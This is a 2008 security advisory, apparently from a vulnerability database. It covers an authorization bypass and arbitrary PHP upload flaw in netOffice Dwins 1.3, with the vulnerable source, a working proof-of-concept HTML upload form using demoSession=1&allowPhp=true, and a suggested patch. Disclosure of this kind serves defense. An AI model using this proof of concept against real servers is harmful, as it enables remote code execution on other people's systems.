netOffice Dwins 1.3 Remote code execution.

2008.05.01
Credit: db
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

netOffice Dwins 1.3 Remote code execution. -------------------------------------------------------- Product: netOffice Dwins Version: 1.3 p2 Vendor: http://netofficedwins.sourceforge.net/ Date: 02/29/08 - Introduction "netOffice Dwins is a free web based time tracking, timesheet, and project management environment." - Details It is possible for an attacker to bypass authorization, upload arbitrary PHP files, and then execute them on the server. netOffice extracts all GET, POST, SESSION, SERVER, and COOKIE parameters into the local variable space. This has the same effect as turning on register globals. The code below is from includes/library.php. //GET array if (!empty($_GET)) { extract($_GET); } else if (!empty($HTTP_GET_VARS)) { extract($HTTP_GET_VARS); } This lets an attacker set demoSession=1 to bypass authorization and freely access any part of the application. Setting the variable to one bypasses the first check ($demoSession != true) but the second boolean expression ($demoSession == 'true') evaluates to false thereby not initializing the action variable to an empty string. // check session validity, except for demo user if (($checkSession == true) && ($demoSession != true)) { // a client user trying to get outside of the "client project site" if (($profilSession == 3) && (!strstr($_SERVER['PHP_SELF'], 'projects_site'))) { header('Location: ../index.php?session=false'); exit; } // disable actions if demo user logged in demo mode if (!empty($action)) { if ($demoSession == 'true') { echo "true"; $closeTopic = ''; $addToSiteTask = ''; $removeToSiteTask = ''; $addToSiteTopic = ''; $removeToSiteTopic = ''; $addToSiteTeam = ''; $removeToSiteTeam = ''; $action = ''; $msg = 'demo'; } } Next an attacker could use access the uploadfile.php form without logging in to upload and execute PHP files. Normally php files are not allowed unless the allowPhp variable is set to true. - Proof of Concept <form accept-charset="UNKNOWN" method="POST" action="http://target/netoffice/projects_site/uploadfile.php?demoSession =1&allowPhp=true&action=add&project=&task=#filedetailsAnchor" name="feeedback" enctype="multipart/form-data"> <input type="hidden" name="MAX_FILE_SIZE" value="100000000"><input type="hidden" name="maxCustom" value=""> <table cellpadding="3" cellspacing="0" border="0"> <tr><th colspan="2">Upload Form</th></tr> <tr><th>Comments :</th><td><textarea cols="60" name="commentsField" rows="6"></textarea></td></tr> <tr><th>Upload :</th><td><input size="35" value="" name="upload" type="file"></td></tr> <tr><th></th><td><input name="submit" type="submit" value="Save"><br><br></td></tr></table> </form> - Solution Authors were notified on 2/19, no fix is currently available. Edit the source to prevent authorization bypass. in includes/library.php change if ($demoSession == 'true') { to if ($demoSession == true) { Author: dB Email: dB [at] rawsecurity.org


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top